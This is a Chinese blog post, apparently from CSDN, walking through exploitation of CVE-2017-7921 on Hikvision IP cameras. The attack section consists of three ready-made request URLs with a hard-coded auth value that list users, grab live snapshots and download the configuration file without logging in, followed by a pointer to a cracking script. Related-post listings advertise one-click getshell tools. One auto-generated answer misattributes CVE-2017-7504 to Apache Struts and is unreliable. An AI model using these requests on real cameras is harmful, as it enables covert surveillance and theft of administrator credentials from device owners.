CVE-2017-7921 海康威视(Hikvision) 摄像头漏洞复现

已于 2023-05-22 16:45:43 修改
阅读量9.6k 收藏 31
点赞数 8
文章标签: 安全 web安全 网络安全
于 2023-05-22 16:42:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/timeless_cz/article/details/130735429
版权

注:此教程仅供学习参考,不涉及任何以破坏为目的的违法犯罪,个人行为与作者无关。

一、漏洞描述

        1.这是一个海康威视摄像头后台管理未授权漏洞,通过构造URL可绕过登录查看监控,检索所有用户和配置文件下载,并获取到监控后台管理账号和密码。

二、漏洞复现

1.在web浏览器中输入以下代码来检索用户与用户列

http://摄像头IP地址/Security/users?auth=YWRtaW46MTEK

 2.在没有进行登录的情况下获取监控快照

http://摄像头IP地址/onvif-http/snapshot?auth=YWRtaW46MTEK

3.下载摄像头配置文件

http://摄像头IP地址/System/configurationFile?auth=YWRtaW46MTEK

  

 4.用python脚本对配置文件进行破解(脚本放在结尾)

5.验证密码是否正确

关注微信公众号菜鸟学渗透后台回复CVE-2017-7921获取脚本 

得点赞+关注,关注微信公众号菜鸟学渗透,有任何问题可以后台私信我!

菜鸟学渗透
关注
海康威视 CVE-2017-7921 未授权
01-12 308
成功利用这些漏洞可能会导致恶意攻击者提升其权限或假设已验证用户的身份并获取敏感数据。
漏洞复现Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 4583
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
海康威视CVE-2017-7921漏洞查找与利用
AngrySnack的博客
10-11 2717
海康威视 CVE-2017-7921 漏洞
工具分享 | Hikvision-是一款海康威视综合漏洞利用工具,漏洞挖掘必备,SRC漏洞挖掘必备,护网红队必备,渗透测试必备,一键getshell。
IT软件汇
09-17 673
工具分享 | Hikvision-是一款海康威视综合漏洞利用工具,漏洞挖掘必备,SRC漏洞挖掘必备,护网红队必备,渗透测试必备,一键getshell。
海康摄像头CVE-2021-36260漏洞复现
热门推荐
剁椒鱼头没剁椒的博客
01-06 2万+
攻击者利用该漏洞可以用无限制的 root shell 来完全控制设备,即使设备的所有者受限于有限的受保护 shell(psh)。除了入侵 IP 摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问 http 或 HTTPS 服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。
CVE-2017-7921漏洞复现
qq_22132931的博客
05-12 2127
CVE-2017-7921漏洞复现
漏洞复现Hikvision摄像头产品越权漏洞(CVE-2017-7921)
晚风不及你
01-20 1966
Hikvision海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-2017-7921CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名...
海康威视CVE-2017-7921
qq_46527139的博客
12-22 1万+
海康威视CVE-2017-7921
海康威视(Hikvision) 摄像头-CVE-2017-7921漏洞复现
m0_49025459的博客
07-04 6597
许多HikvisionIP摄像机包含一个后门,允许未经身份验证的模拟任何配置的用户帐户。
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
最新发布
菜鸟学渗透
10-08 707
海康威视IP摄像机/NVR设备固件远程代码执行漏洞(CVE-2021-36260)
海康威视综合安防管理平台 detection 前台RCE漏洞复现
0xSec
07-22 5137
海康威视综合安防管理平台 /center/api/installation/detection 接口处存在远程命令执行漏洞,未经身份验证的远程攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。
CVE-2017-7921复现(解密文件)
1stPeak's Blog
06-03 1万+
前言:CSDN管理博客内容较严格,有些内容会涉嫌违法违规,以往发布的被打回,这篇文章是经修改后的,故下面有些内容我会粗略写到,大家主要看payload即可 可解密:configurationFile
海康威视漏洞合集
weixin_46626737的博客
07-03 4862
解密脚本地址:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor。操作技巧:/api/video/v2/cameras/previewURLs,访问是否返回rtsp数据流地址,若返回,访问就是摄像头。poc检测工具地址:https://github.com/sccmdaveli/hikvision-poc。漏洞版本:大多数设备。
cve-2017-7504漏洞复现
08-23
您好!对于CVE-2017-7504漏洞复现,请注意以下几个步骤: 1. 确认受影响的软件版本:CVE-2017-7504是一个Apache Struts 2框架中的远程代码执行漏洞。在复现之前,请确保目标系统运行的是受影响的Apache Struts 2版本。 2. 搭建相应的环境:您可以在漏洞复现环境中使用Apache Struts 2漏洞测试框架,例如Metasploit或其他可用的漏洞测试工具。 3. 指定目标URL:使用合适的工具,指定目标URL以进行漏洞利用。通常,您需要提供目标系统上受影响的Struts 2应用程序的URL。 4. 发起攻击:使用漏洞利用工具执行相应的攻击代码。具体的攻击方法取决于您使用的工具和漏洞利用脚本。 请注意,漏洞复现属于未经授权的活动,可能违反法律法规,因此我们强烈建议仅在合法授权和合规测试范围内进行漏洞复现。此外,对于未经授权或非法目的使用该漏洞进行攻击是违法行为,且可能导致严重后果。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

菜鸟学渗透

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值